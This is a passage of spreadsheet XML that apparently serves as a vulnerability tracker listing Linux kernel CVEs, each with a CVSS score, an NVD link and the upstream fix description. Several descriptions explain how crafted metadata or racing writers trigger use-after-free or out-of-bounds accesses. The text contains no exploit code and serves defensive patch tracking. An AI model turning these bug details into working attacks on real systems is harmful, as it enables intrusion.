      <c r="Q376" s="5" t="inlineStr"/>
      <c r="R376" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7925: cancel pending mlo_pm_work
If the device is reset, suspended or unregistered within that window,
the pending work can still run and access vif/bss data that may already
be freed, or send MCU commands while the firmware is not available.
Add cancel_delayed_work_sync(&amp;dev-&gt;mlo_pm_work) in all relevant teardown
and suspend paths:
 - mt7925_mac_reset_work()        (chip reset recovery)
 - mt7925e_unregister_device()    (PCIe unbind)
 - mt7925_pci_suspend()           (PCIe bus suspend)
 - mt7925_suspend()               (mac80211 suspend)
 - mt7925u_suspend()              (USB bus / runtime suspend)
This ensures the work is stopped before the device state becomes
invalid.</t>
        </is>
      </c>
      <c r="S376" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89523</t>
        </is>
      </c>
    </row>
    <row r="377">
      <c r="A377" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B377" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C377" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89540</t>
        </is>
      </c>
      <c r="D377" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E377" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F377" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G377" s="5" t="inlineStr"/>
      <c r="H377" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I377" s="5" t="inlineStr"/>
      <c r="J377" s="5" t="inlineStr"/>
      <c r="K377" s="5" t="inlineStr"/>
      <c r="L377" s="5" t="inlineStr"/>
      <c r="M377" s="5" t="inlineStr"/>
      <c r="N377" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O377" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P377" s="5" t="inlineStr"/>
      <c r="Q377" s="5" t="inlineStr"/>
      <c r="R377" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sunrpc: init gssp_lock before publishing proc entry
create_use_gss_proxy_proc_entry() publishes /proc/net/rpc/use-gss-proxy
via proc_create_data() before init_gssp_clnt() runs mutex_init() on
sn-&gt;gssp_lock.  Once the dentry is linked under proc_subdir_lock it is
immediately reachable from userspace, so a write that lands in the
window drives set_gssp_clnt() into mutex_lock() on a zero-initialized
struct mutex.
    create_use_gss_proxy_proc_entry(net)
      proc_create_data("use-gss-proxy", ...)   /* dentry live */
      init_gssp_clnt(sn)
        mutex_init(&amp;sn-&gt;gssp_lock)             /* too late */
    write_gssp()
      set_gssp_clnt(net)
        mutex_lock(&amp;sn-&gt;gssp_lock)             /* uninitialized */
        gssp_rpc_create(...)
        sn-&gt;gssp_clnt = clnt
        mutex_unlock(&amp;sn-&gt;gssp_lock)
The window spans only the two statements between proc_create_data()
returning and init_gssp_clnt(), so a writer reaches it only if the
registering thread is preempted there while another task is already
opening the freshly published file.  register_pernet_subsys() runs in
preemptible context under pernet_ops_rwsem, so that preemption is
possible, and the window widens on auth_rpcgss module load, when the
proc entry is created for every live net namespace whose tasks are
already running.  A writer that wins the race locks a zero-filled
struct mutex.  On CONFIG_DEBUG_MUTEXES the missing magic value trips a
"lock used without init" splat; on a production kernel the fast path
acquires the lock via CMPXCHG(owner, 0, current).  In the latter case
a second writer that arrives before init_gssp_clnt() re-zeroes owner
can enter set_gssp_clnt() concurrently, shut down the first writer's
clnt while it is still in use, and leak the loser's clnt.
Fix by initializing sn-&gt;gssp_lock in sunrpc_init_net() so its lifetime
matches the sunrpc_net it lives in.  sn-&gt;gssp_clnt is already NULL from
the kzalloc that backs net_generic storage, so the lazy helper is no
longer needed; drop init_gssp_clnt(), its prototype, and the call from
create_use_gss_proxy_proc_entry().  sunrpc.ko is a build-time
dependency of auth_rpcgss.ko, so sunrpc_init_net() has always run on
every netns before any auth_gss pernet init can publish the proc
entry.</t>
        </is>
      </c>
      <c r="S377" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89540</t>
        </is>
      </c>
    </row>
    <row r="378">
      <c r="A378" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B378" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C378" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89545</t>
        </is>
      </c>
      <c r="D378" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E378" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F378" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G378" s="5" t="inlineStr"/>
      <c r="H378" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I378" s="5" t="inlineStr"/>
      <c r="J378" s="5" t="inlineStr"/>
      <c r="K378" s="5" t="inlineStr"/>
      <c r="L378" s="5" t="inlineStr"/>
      <c r="M378" s="5" t="inlineStr"/>
      <c r="N378" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O378" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P378" s="5" t="inlineStr"/>
      <c r="Q378" s="5" t="inlineStr"/>
      <c r="R378" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sunrpc: defer rq_argp and rq_resp free until after RCU grace period
svc_rqst_free() frees rqstp-&gt;rq_argp and rqstp-&gt;rq_resp synchronously
via kfree(), but defers the rqstp struct free via kfree_rcu().  After
svc_exit_thread() calls list_del_rcu() and svc_rqst_free(), there is
a window where RCU readers that started before list_del_rcu() can still
traverse the thread list and find the rqstp.  These readers (e.g.
nfsd_nl_rpc_status_get_dumpit()) dereference rqstp-&gt;rq_argp, which has
already been freed — a use-after-free.
Fix this by moving the kfree of rq_argp and rq_resp into an explicit
call_rcu() callback alongside the struct free.  Resources not accessed
by RCU readers (bvec, buffer pages, scratch folio, auth_data) remain
synchronously freed.</t>
        </is>
      </c>
      <c r="S378" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89545</t>
        </is>
      </c>
    </row>
    <row r="379">
      <c r="A379" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B379" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C379" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89548</t>
        </is>
      </c>
      <c r="D379" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E379" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F379" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G379" s="5" t="inlineStr"/>
      <c r="H379" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I379" s="5" t="inlineStr"/>
      <c r="J379" s="5" t="inlineStr"/>
      <c r="K379" s="5" t="inlineStr"/>
      <c r="L379" s="5" t="inlineStr"/>
      <c r="M379" s="5" t="inlineStr"/>
      <c r="N379" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O379" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P379" s="5" t="inlineStr"/>
      <c r="Q379" s="5" t="inlineStr"/>
      <c r="R379" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
SUNRPC: always drain cache_cleaner before destroying a cache_detail
sunrpc_destroy_cache_detail() only cancels the global cache_cleaner
delayed_work when cache_list is empty.  During per-netns teardown
cache_list is never empty because init_net's caches remain registered,
so the cancel never fires.  After unlink, the caller proceeds to
cache_destroy_net() which kfrees the cache_detail while cache_clean()
may still hold a dangling pointer to it.  The result is a
use-after-free: cache_dequeue() takes cd-&gt;queue_lock on freed memory,
and cache_put() dereferences cd-&gt;cache_put as a function pointer from
freed slab.
Drop the list_empty guard so that cancel_delayed_work_sync() always
runs, ensuring any in-flight cache_clean() completes before the
cache_detail is freed.  Re-arm the cleaner afterwards if other caches
are still registered.</t>
        </is>
      </c>
      <c r="S379" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89548</t>
        </is>
      </c>
    </row>
    <row r="380">
      <c r="A380" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B380" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C380" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89553</t>
        </is>
      </c>
      <c r="D380" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E380" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F380" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G380" s="5" t="inlineStr"/>
      <c r="H380" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I380" s="5" t="inlineStr"/>
      <c r="J380" s="5" t="inlineStr"/>
      <c r="K380" s="5" t="inlineStr"/>
      <c r="L380" s="5" t="inlineStr"/>
      <c r="M380" s="5" t="inlineStr"/>
      <c r="N380" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O380" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P380" s="5" t="inlineStr"/>
      <c r="Q380" s="5" t="inlineStr"/>
      <c r="R380" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nouveau/gem: reserve the bo in the info ioctl around the vma lookup
In the non-uvmm path, there could be a race between the info lookup
finding the vma, and the gem close path closing the vma leading
to a use-after-free.
Spotted with the help of Opus 4.6.</t>
        </is>
      </c>
      <c r="S380" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89553</t>
        </is>
      </c>
    </row>
    <row r="381">
      <c r="A381" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B381" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C381" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89557</t>
        </is>
      </c>
      <c r="D381" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E381" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F381" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G381" s="5" t="inlineStr"/>
      <c r="H381" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I381" s="5" t="inlineStr"/>
      <c r="J381" s="5" t="inlineStr"/>
      <c r="K381" s="5" t="inlineStr"/>
      <c r="L381" s="5" t="inlineStr"/>
      <c r="M381" s="5" t="inlineStr"/>
      <c r="N381" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O381" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P381" s="5" t="inlineStr"/>
      <c r="Q381" s="5" t="inlineStr"/>
      <c r="R381" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
md: do overflow check for sb-&gt;bblog_shift in super_1_load()
In super_1_load(), sb-&gt;bblog_shift is an __u8 type value loaded from on-
disk superblock. It is used for badblocks API badblocks_set() by the
following sequence,
 1930   rdev-&gt;badblocks.shift = sb-&gt;bblog_shift;
 1931   for (i = 0 ; i &lt; (sectors &lt;&lt; (9-3)) ; i++, bbp++) {
 1932           u64 bb = le64_to_cpu(*bbp);
 1933           int count = bb &amp; (0x3ff);
 1934           u64 sector = bb &gt;&gt; 10;
 1935           sector &lt;&lt;= sb-&gt;bblog_shift;
 1936           count &lt;&lt;= sb-&gt;bblog_shift;
 1937           if (bb + 1 == 0)
 1938                   break;
 1939           if (!badblocks_set(&amp;rdev-&gt;badblocks, sector, count, 1))
 1940                   return -EINVAL;
 1941   }
bb-&gt;bblog_shit is in range of 0-255, variable sector is 64bit width, for
an invalid bb-&gt;bblog_shit, it is possible to make sector be overflowed
by the following calculation,
 1935           sector &lt;&lt;= sb-&gt;bblog_shift;
Then in turn when call badblocks_set() at line 1939 with the invalid
rdev-&gt;badblocks.shift set at line 1930, may result an overflow inside
_badblocks_clear() in block/badblocks.c.
Although there are many places to call badblocks APIs, the non-zero
shift value is only used in super_1_load(), other places always use 0 as
the shift value. Therefore it is unnecessary to do a general shift value
overflow check inside badblock API, and just check here as the caller.
This may avoid unnecessary check, make the badblocks API code more simple
and elegant.</t>
        </is>
      </c>
      <c r="S381" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89557</t>
        </is>
      </c>
    </row>
    <row r="382">
      <c r="A382" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B382" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C382" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89559</t>
        </is>
      </c>
      <c r="D382" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E382" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F382" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G382" s="5" t="inlineStr"/>
      <c r="H382" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I382" s="5" t="inlineStr"/>
      <c r="J382" s="5" t="inlineStr"/>
      <c r="K382" s="5" t="inlineStr"/>
      <c r="L382" s="5" t="inlineStr"/>
      <c r="M382" s="5" t="inlineStr"/>
      <c r="N382" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O382" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P382" s="5" t="inlineStr"/>
      <c r="Q382" s="5" t="inlineStr"/>
      <c r="R382" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
libnvdimm/labels: Prevent integer overflow in __nd_label_validate()
The on-media namespace index field nslot is a u32 read from the DIMM
label storage area.  __nd_label_validate() bounds it against the config
area size, but sizeof_namespace_label() returns unsigned, so the product
nslot * label_size is evaluated in 32-bit and wraps modulo 2^32 before
the comparison.  A crafted nslot passes the bound and is then used as the
loop trip count in nd_label_data_init(), whose memset() walks off the end
of the config_size buffer: an out-of-bounds write.
The field is not trusted -- it comes from the medium, or from userspace
via ND_CMD_SET_CONFIG_DATA.  Evaluate the product in 64-bit so the bound
check is exact; conforming labels are unaffected.
The check was safe when introduced by commit 4a826c83db4e ("libnvdimm:
namespace indices: read and validate"): it multiplied by sizeof(struct
nd_namespace_label), a size_t, so on a 64-bit build the product did not
wrap.  Commit 564e871aa66f ("libnvdimm, label: add v1.2 nvdimm label
definitions") narrowed it to 32 bits when the label size became a runtime
value read via sizeof_namespace_label().</t>
        </is>
      </c>
      <c r="S382" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89559</t>
        </is>
      </c>
    </row>
    <row r="383">
      <c r="A383" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B383" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C383" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89562</t>
        </is>
      </c>
      <c r="D383" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E383" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F383" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G383" s="5" t="inlineStr"/>
      <c r="H383" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I383" s="5" t="inlineStr"/>
      <c r="J383" s="5" t="inlineStr"/>
      <c r="K383" s="5" t="inlineStr"/>
      <c r="L383" s="5" t="inlineStr"/>
      <c r="M383" s="5" t="inlineStr"/>
      <c r="N383" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O383" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P383" s="5" t="inlineStr"/>
      <c r="Q383" s="5" t="inlineStr"/>
      <c r="R383" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ip6_gre: fix hardware header length for NBMA tunnels
ip6gre_tnl_link_config_route() accumulates the lower device's hardware
header length into dev-&gt;hard_header_len whenever header_ops is set. This
is incorrect for both users of header_ops.
ip6gretap and ip6erspan have a fixed Ethernet hardware header length.
For an NBMA ip6gre tunnel, ip6gre_header() creates only the GRE header,
the optional FOU or GUE header, and the outer IPv6 header. The lower
device header is headroom needed later, not part of the tunnel device's
hardware header.
Keep the lower device header in needed_headroom. Set hard_header_len to
the tunnel header length only for ARPHRD_IP6GRE devices with header_ops,
and leave the fixed Ethernet header length unchanged for tap and erspan
devices.</t>
        </is>
      </c>
      <c r="S383" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89562</t>
        </is>
      </c>
    </row>
    <row r="384">
      <c r="A384" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B384" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C384" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89563</t>
        </is>
      </c>
      <c r="D384" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E384" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F384" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G384" s="5" t="inlineStr"/>
      <c r="H384" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I384" s="5" t="inlineStr"/>
      <c r="J384" s="5" t="inlineStr"/>
      <c r="K384" s="5" t="inlineStr"/>
      <c r="L384" s="5" t="inlineStr"/>
      <c r="M384" s="5" t="inlineStr"/>
      <c r="N384" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O384" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P384" s="5" t="inlineStr"/>
      <c r="Q384" s="5" t="inlineStr"/>
      <c r="R384" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ip6_tunnel: use skb_cow_head() in ip6_tnl_xmit()
ip6_tnl_xmit() may need to expand headroom before it can push the
outer IPv6 and optional encap headers. It currently does that with
skb_realloc_headroom(), copies skb-&gt;sk ownership, consumes the original
skb, and then continues processing with the replacement skb kept only in
its local variable.
That is safe only if the helper cannot fail afterwards. But this helper
still has post-reallocation error exits. collect_md tunnels reject
non-NONE encap after the replacement, and ip6_tnl_encap() can also fail
later. In those cases the helper returns an error to its callers while
the caller still only has the original skb pointer.
Both ip6_tnl_start_xmit() and the IPv6 GRE paths free the caller skb on
error, so they can end up freeing an skb that ip6_tnl_xmit() already
consumed.
Use skb_cow_head() instead. It provides the required headroom and
writability without privately replacing the caller-owned skb, so later
error returns cannot leave callers with a stale pointer.
The Ethernet users, ip6gretap and ip6erspan, clear IFF_TX_SKB_SHARING
and already call skb_cow_head() before entering ip6_tnl_xmit(). They do
not rely on the removed skb_shared() reallocation. This also makes the
IPv6 tunnel path consistent with ip_tunnel_xmit().</t>
        </is>
      </c>
      <c r="S384" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89563</t>
        </is>
      </c>
    </row>
    <row r="385">
      <c r="A385" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B385" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C385" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89564</t>
        </is>
      </c>
      <c r="D385" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E385" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F385" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G385" s="5" t="inlineStr"/>
      <c r="H385" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I385" s="5" t="inlineStr"/>
      <c r="J385" s="5" t="inlineStr"/>
      <c r="K385" s="5" t="inlineStr"/>
      <c r="L385" s="5" t="inlineStr"/>
      <c r="M385" s="5" t="inlineStr"/>
      <c r="N385" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O385" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P385" s="5" t="inlineStr"/>
      <c r="Q385" s="5" t="inlineStr"/>
      <c r="R385" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ip: orphan prefetched skbs before multicast forwarding
IPv4 and IPv6 input preserve an skb-&gt;sk association installed by
bpf_sk_assign() so that local delivery can use the selected socket under
RCU. Both address families can also prefetch a socket in UDP early demux.
In both paths (BPF and UDP early demux) a reference is not guaranteed to
be held on the socket.
When a multicast packet is not locally deliverable, IPv6 hands the
original skb to ip6_mr_input(). IPv4's ip_mr_input() similarly keeps the
original skb when local delivery is not needed. Either path can put the
skb on an unresolved multicast route queue or forward it after the
receive-side RCU section ends.
After the prefetched socket is destroyed, a later skb free invokes
sock_pfree() and dereferences the stale skb-&gt;sk. Orphan the skb before
each non-local multicast forwarding path. Local delivery retains the
original skb; the existing skb_clone() calls provide multicast forwarding
with a socket-free clone.</t>
        </is>
      </c>
      <c r="S385" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89564</t>
        </is>
      </c>
    </row>
    <row r="386">
      <c r="A386" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B386" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C386" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89570</t>
        </is>
      </c>
      <c r="D386" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E386" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F386" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G386" s="5" t="inlineStr"/>
      <c r="H386" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I386" s="5" t="inlineStr"/>
      <c r="J386" s="5" t="inlineStr"/>
      <c r="K386" s="5" t="inlineStr"/>
      <c r="L386" s="5" t="inlineStr"/>
      <c r="M386" s="5" t="inlineStr"/>
      <c r="N386" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O386" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P386" s="5" t="inlineStr"/>
      <c r="Q386" s="5" t="inlineStr"/>
      <c r="R386" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cxl/mce: Make the MCE notifier per-region
Flavien Solt reported lifetime issues with the CXL MCE notifier, which
can lead to NULL dereferences and use-after-free in the MCE handler.
The notifier was registered per memory device and stored in 'struct
cxl_memdev_state', even though it only needs the region state (the
region's SPA range and its extended linear cache size).
Instead of keeping the memory device and endpoint alive, the correct fix
is to move the notifier into 'struct cxl_region' and register it from
cxl_region_probe() as it should be a per-region notifier. Setup the
registration to only happen for regions that have an extended linear
cache as that is the only current usage.
Remove cxl_port_get_spa_cache_alias() as it is now dead code.
[ dj: Update dev_warn() when notifier fails due to kconfig. (Ben) ]</t>
        </is>
      </c>
      <c r="S386" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89570</t>
        </is>
      </c>
    </row>
    <row r="387">
      <c r="A387" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B387" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C387" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89573</t>
        </is>
      </c>
      <c r="D387" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E387" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F387" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G387" s="5" t="inlineStr"/>
      <c r="H387" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I387" s="5" t="inlineStr"/>
      <c r="J387" s="5" t="inlineStr"/>
      <c r="K387" s="5" t="inlineStr"/>
      <c r="L387" s="5" t="inlineStr"/>
      <c r="M387" s="5" t="inlineStr"/>
      <c r="N387" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O387" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P387" s="5" t="inlineStr"/>
      <c r="Q387" s="5" t="inlineStr"/>
      <c r="R387" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dm array: reject an array block whose value size is not the caller's
array_block_check() can only compare the header against itself, so a block
with value_size 4 and max_entries 1018 is internally consistent and passes.
dm-cache keeps two arrays -- mappings at 8 bytes and hints at 4 -- and the
roots for both live in the superblock. Point the mappings root at a hint
block and __load_mappings() walks it through an info whose value size is 8,
so element_at() strides 8 bytes over 4-byte entries and reaches offset 8160
of a 4096-byte block.
get_ablock() and __shadow_ablock() are the two places that hold the block
and the caller at once. Reject there when the two value sizes disagree.
Arrays only ever read their own blocks, so this fires on crafted metadata
only.</t>
        </is>
      </c>
      <c r="S387" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89573</t>
        </is>
      </c>
    </row>
    <row r="388">
      <c r="A388" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B388" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C388" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89574</t>
        </is>
      </c>
      <c r="D388" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E388" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F388" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G388" s="5" t="inlineStr"/>
      <c r="H388" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I388" s="5" t="inlineStr"/>
      <c r="J388" s="5" t="inlineStr"/>
      <c r="K388" s="5" t="inlineStr"/>
      <c r="L388" s="5" t="inlineStr"/>
      <c r="M388" s="5" t="inlineStr"/>
      <c r="N388" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O388" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P388" s="5" t="inlineStr"/>
      <c r="Q388" s="5" t="inlineStr"/>
      <c r="R388" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dm array: validate array block headers on read
array_block_check() validates blocknr and csum and nothing else, while
node_check(), next to it, has bounded the structural fields since both
were written. dm_array_cursor_next() takes its loop bound from the
on-disk nr_entries and element_at() is unguarded pointer arithmetic, so
a count larger than the block holds keeps the cursor in one block while
the index grows past it and the read walks off the dm-bufio buffer --
dm_cache_load_mappings() drives it once per cache block at activation.
Check the header against itself: reject a zero value_size, require
max_entries to equal calc_max_entries() for that value_size and block
size, and require nr_entries to fit. Equality rather than an upper bound,
since a count below the real capacity trips BUG_ON() in fill_ablock() and
trim_ablock(). Metadata dm-array writes satisfies all three.</t>
        </is>
      </c>
      <c r="S388" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89574</t>
        </is>
      </c>
    </row>
    <row r="389">
      <c r="A389" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B389" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C389" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89579</t>
        </is>
      </c>
      <c r="D389" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E389" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F389" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G389" s="5" t="inlineStr"/>
      <c r="H389" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I389" s="5" t="inlineStr"/>
      <c r="J389" s="5" t="inlineStr"/>
      <c r="K389" s="5" t="inlineStr"/>
